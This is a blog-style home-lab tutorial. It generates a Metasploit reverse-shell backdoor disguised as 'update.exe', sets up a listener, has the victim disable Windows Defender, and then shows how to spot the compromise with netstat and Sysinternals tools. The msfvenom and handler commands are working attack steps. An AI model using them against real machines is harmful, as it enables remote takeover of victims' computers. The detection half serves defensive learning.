Creating a Backdoor.Exe and How to Detect If Your PC Has Been Hacked!
“DISCLAIMER”
Hacking without permission is illegal. This blog is strictly educational for learning about cyber-security in the areas of ethical hacking and penetration testing so that we can protect ourselves against the real hackers.
System Overview
On the left side, I have a Windows 10 machine as the victim with the IP address 192.168.1.18, and on the right side, I have Kali Linux as the attacker with the IP address 192.168.1.11. Both are deployed in virtual machines, and they are connected to the same network.
Part 1 — Creating A Backdoor .Exe Using Kali Linux
In this section, we will use Kali Linux to create an .exe file that we will use to hack a Windows 10 machine with msfvenom. Let’s start by launching msfconsole in the terminal:
sudo msfconsole
After that we need to create .exe file using msfvenom, using this command
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IPAddress> LPORT=<PortThatWeAreGoingtoUse> -f exe -o <file_path>Here is the command that i type in my kali linux:
Breakdown of the command:
msfvenom:
- A tool from the Metasploit Framework used to generate malicious payloads, such as trojans or backdoors. It combines the functionalities of the old
msfpayloadandmsfencodetools.
-p windows/meterpreter/reverse_tcp:
-p: This option specifies the payload you want to generate.windows/meterpreter/reverse_tcp: This payload is a Meterpreter reverse TCP payload for Windows systems. When executed on the target (Windows), it creates a reverse connection back to the attacker's machine (Kali Linux in this case). Meterpreter is an advanced payload that provides a remote shell with extended capabilities.
LHOST=192.168.1.11:
LHOST: Refers to the local IP address (Listening Host), which is the machine waiting to receive the reverse connection. Here, 192.168.1.11 is the IP address of the attacker's Kali Linux machine.
LPORT=4444:
LPORT: The local port (Listening Port) that will be used to listen for the reverse connection from the target. In this case, the port is 4444 (a common default port used in Metasploit for reverse shells).
-f exe:
-f: This specifies the output format of the payload.exe: The payload will be generated as an executable file (.exe), suitable for execution on Windows.
-o /home/superstar/update.exe:
-o: This option specifies the output file path./home/superstar/update.exe: The generated payload will be saved asupdate.exein the directory/home/superstar/.
Overall Explanation:
This command creates an update.exe file containing a reverse TCP Meterpreter payload. When this file is executed on a Windows machine (the target), it will attempt to create a reverse connection to the attacker’s Kali Linux machine with the IP 192.168.1.11 on port 4444. Once the connection is established, the attacker gains a Meterpreter shell on the target, allowing them to execute commands, download files, and perform various actions remotely.
As you can see in the image above, we have already created a .exe file that we are going to use to hack our target. In this case, it is our Windows 10 machine with the IP address 192.168.1.18.
Part 2— Set Up A Listener
Lets open a terminal and type
sudo msfconsoleand
use exploit/multi/handlerthen set the payload
set payload windows/meterpreter/reverse_tcp
Once its done, lets check the requirement by type
show options
As you can see, we need to set the LHOST and LPORT. LHOST is the IP address of our Kali Linux machine, and LPORT is the port that we will use for communication. Take a look at part 1, where we set the port in the .exe file to port 4444.
Now lets set the LHOST:
set LHOST 192.168.1.11and then run our listener by typing
exploit
Take a look at the picture; we have already set our listener, and all we need to do is wait for the .exe file to be executed on the Windows machine. Don’t close this terminal. Once the .exe file is executed on the Windows machine, we will have successfully entered the system.
Part 3— Run The .exe File On The Windows Machine
Download the .exe file that we have named update.exe from Kali Linux. We can use a web server like Apache in Kali Linux to host update.exe so that it can be downloaded by the victim.
Look at the picture above; my Windows machine already has the update.exe file and is ready to be executed. But before that, we can’t execute the file if Windows Defender is active, so we need to disable Windows Defender. Once Windows Defender is disabled, we are ready to go.
We can run the update.exe just by double clicking the file, and then will come up this pop up
Click yes
and done, we already hacked the windows 10 machine. Now take a look at our kali linux machine. In the terminal that we already set our listerner will come up something like this, meterpreter session 1 opened~
We can enter powershell mode by typing “shell” and type “whoami” to display the currently logged-in user’s username and additional information about the user account.
Part 4— How can we detect if our PC has been hacked and is being compromise or controlled remotely?
In this case im going to show you what is the sign that our windows machine already hacked by our Kali Linux.
The steps are:
- We need to identify the strange process that running in our machine.
- Identify the unusual ip address that connect to our machine.
- Strange port number, like outside port 80 or 443.
First, we need to open command prompt and type:
netstat -ano | findstr "ESTABLISHED"and here is the result
As you can see, there are a couple of connections that have already been established. Take a look at the first line; the Windows machine is already connected to 192.168.1.11:4444, which is the IP address of our Kali Linux machine, and 4444 is the port we are using in the .exe file that we created. The other connection is normal because its using port 443 which is HTTPS. The rightmost column is the process id that use in communication.
Now lets check the process id of our .exe file, in this case 6080. We can check in taskmanager in tab details
You can right click and click properties to get the detail of the process. If you end the process by click End Task at the right bottom it will disconnect the communication between the windows machine and the kali linux machine.
Advanced Investigate
If we want advanced investigate we can download sysinternal suite by microsoft. The Sysinternals Suite is a collection of tools developed by Microsoft to help users and Windows administrators analyze, troubleshoot, and manage the Windows operating system. We can download here
After you downloaded the file, we can extract the file.
The example to investigate, we can run Autoruns64.exe. Autoruns64.exe is used to detect if a backdoor has a persistence method in our system. The method to detect it is by checking the publisher that uses the autorun function whenever our machine boots up. Once we see an unverified publisher, we need to be suspicious of the process.
Look at the picture above; the tools will tell you whether the publisher is verified or not. With this information, you can determine if the running program is suspicious.
Next tools in sysinternals suite, we can use tcpview64.exe
And it will come up something like this
As you can see, we can monitor the packets they send and receive.
Next tools in sysinternals suite, we can use procmon64.exe
Procmon64 is to used to identify all the process, it can show the process tree of a process. As you can see our backdoor .exe file already change the process id to 2768, and we want to see process tree of update.exe. To monitor the process of update.exe we can use filter
Click filter, change to process name and type update.exe, and click add — click apply — click ok. And we will see all the process of update.exe
As you can see there is TCP receive and TCP send it means they are communicating. Next, we can check process tree
In process tree we can see there is whoami.exe, it because in my kali linux i was typing “whoami”
When I tried ping google.com from kali linux, they are come up ping.exe process in process tree
Thats All, thanks for reading.
